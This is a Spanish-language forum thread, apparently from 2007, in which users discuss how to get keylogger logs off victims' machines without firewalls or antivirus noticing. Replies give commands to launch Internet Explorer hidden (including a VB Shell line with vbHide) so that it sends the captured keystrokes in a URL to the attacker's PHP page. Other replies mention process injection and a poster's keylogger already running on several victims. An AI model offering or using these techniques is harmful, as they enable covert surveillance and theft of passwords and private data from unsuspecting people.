Hola amigos.
Quiero hacer un keylogger, ya buscaré algunos ejemplos. Pero sé que me encontraré con una fase un tanto complicada; la transferencia del log de la víctima.
La puedo subir por ftp a un servidor y luego descargarla, pero los antivirus/firewalls lo detectarán. También me la puedo enviar por email con Winsock... pero tmb lo detectarán. Una idea que tuve fue que el keylogger crease un ftp.bat y lo ejecutase (así se enviaría desde la consola de MS-DOS) pero me parece que lo probé y me saltaba hasta el firewall de Güindows.
Un buen método que ya usé alguna vez consistía en extraer el username/password de un programa leyendo en unas determinadas direcciones (obtenibles con Tsearch) de la memoria. Luego, hacía que la víctima me enviase el username/password cifrados por una conversación del MSN.
Pero en esta ocasión, ese método no me sirve.
Oí hablar de que se podía usar IE para enviar datos, pero no se como.
A ver si a alguien se le ocurre alguna idea de burlar los firewalls que no sea desactivandolos (por que el usuario se dará cuenta).
Gracias de antemano.
cuando el usuario ande navegando por internet, que se conecte a alguna página (envie alguna variable con la info) y listo xD
por supuesto deberías tener tu esa pag configurada para que absorba los datos y redireccione rapidamente a otro sitio o cualquier cosa que se te ocurra xD
(un popup nunca levanta sospecha, eso si no estes todo el rato haciendolo xD)
Yo lo que necesito es transferir los datos, ya me las apañaré para conseguirlos. Gracias de todos modos.
Por cierto... un .php puede enviar un archivo por ftp? Lo que si que se puede es, desde flash (que el firewall no bloquea), enviar datos. Voy a seguir investigando. A ver si alguien me puede ayudar.
mi keylogger instalado en las distintas victimas genera un archivo con las teclas pulsadas, éstas estan un poco cifradas para casos en que alguien los pueda abrir, pues son de texto plano, ahora para transferirlos desde la victima hasta mi PC lo hago como si de un archivo cualquiera se tratara via WinSock y no salta nada de nada, hasta ahora todo va bien y con absoluta normalidad.
Cita de: yovaninu en 22 Abril 2007, 20:39 PM
mi keylogger instalado en las distintas victimas genera un archivo con las teclas pulsadas, éstas estan un poco cifradas para casos en que alguien los pueda abrir, pues son de texto plano, ahora para transferirlos desde la victima hasta mi PC lo hago como si de un archivo cualquiera se tratara via WinSock y no salta nada de nada, hasta ahora todo va bien y con absoluta normalidad.
Eso con el fw del win :xD :xD un fw un poco decente saltaria.
Para saltarlos necesitarias inyectar tu proceso, y ni aveces con esas se puede...
Para inyectarlo no puedes usar VB, eso si
Cita de: Scratz en 22 Abril 2007, 20:28 PM
Yo lo que necesito es transferir los datos, ya me las apañaré para conseguirlos. Gracias de todos modos.
y que te he dicho? xD
Haces que tu programa lance el iexplore de forma oculta así:
iexplore.exe http://tuweb.com/pillalogs.php?log="tusdatosblabla"
Luego tu php que guarde esa variable en un archivo y listo.
La mayoría de firewalls no lo pillan, pero hay bastantes que si. Para que no te cace ningún firewall el único método realmente efectivo es la inyección.
Cita de: MazarD en 23 Abril 2007, 16:28 PM
Haces que tu programa lance el iexplore de forma oculta así:
iexplore.exe http://tuweb.com/pillalogs.php?log="tusdatosblabla"
Luego tu php que guarde esa variable en un archivo y listo.
La mayoría de firewalls no lo pillan, pero hay bastantes que si. Para que no te cace ningún firewall el único método realmente efectivo es la inyección.
Gracias MazarD, pero no tendrás algún ejemplo de eso de "lanzar el iexplorer con esa web de forma oculta". Por que no tengo mucha idea. Sobre lo del php ya me las arreglaré, pero eso de lanzar el iexplorer oculto me interesa.
en bat
@start iexplorer.exe http://....
en vb sera casi igual
shell....
hay una forma q es indetectable pero un poco brusca es que cree una web en html que al ser ejecutada se te envien los datos y luego se cierre automatic.
Cita de: dimitrix1 en 23 Abril 2007, 18:56 PM
en bat
@start iexplorer.exe http://....
en vb sera casi igual
shell....
hay una forma q es indetectable pero un poco brusca es que cree una web en html que al ser ejecutada se te envien los datos y luego se cierre automatic.
Gracias, pero no sé como hacer que no sea visible el iexplore. En cuanto a lo de transferir, haré que se cargue un .php que me envie los datos por ftp. Supongo que eso es indetectable ¿no?
pero recuerda no ejecutar el php en su pc q no se puede :o
tambien podrias guardarlos como un cookies y luego con un codigo lo cojes.
Shell "C:\ruta\iexplore.exe http://tuweb.es/tal.php?tal=tal", vbHide
La última pregunta no la entiendo, EN PRINCIPIO porque va a ser detectable abrir una web con internetexplorer? y que mas dá si es un php o un html? y para que enviar los datos a ningún sitio?
Dónde tengas hospedado el php haces que cree un archivo log.txt con el contenido de la variable tal= y yastá. :S
Cita de: MazarD en 24 Abril 2007, 22:49 PM
La última pregunta no la entiendo, EN PRINCIPIO porque va a ser detectable abrir una web con internetexplorer?
El kaspersky si lo detecta.
Saludos.
Cita de: MazarD en 24 Abril 2007, 22:49 PM
Shell "C:\ruta\iexplore.exe http://tuweb.es/tal.php?tal=tal", vbHide
La última pregunta no la entiendo, EN PRINCIPIO porque va a ser detectable abrir una web con internetexplorer? y que mas dá si es un php o un html? y para que enviar los datos a ningún sitio?
Dónde tengas hospedado el php haces que cree un archivo log.txt con el contenido de la variable tal= y yastá. :S
Perdona, no sé mucho de HTML, y de PHP no se nada. Será por eso que he dicho algo incoherente, bueno ya me las apañaré. Gracias de todos modos.
pos si es en vb crea un formulario oculto en el q pongas el control "Microsoft internet controls" todo oculto y listo trabajas desde alli mandando parametros a un php en un host como ya hablaron arriba....
Saludox
EINFLUSS.
CitarCitarLa última pregunta no la entiendo, EN PRINCIPIO porque va a ser detectable abrir una web con internetexplorer?
El kaspersky si lo detecta.
Saludos.
Jareth, por eso el "EN PRINCIPIO" en mayúsculas. Sin inyeccion de código o raw sockets ésto y usar sendmessage con una ventana abierta de iexplore es de lo máximo a lo que se puede llegar.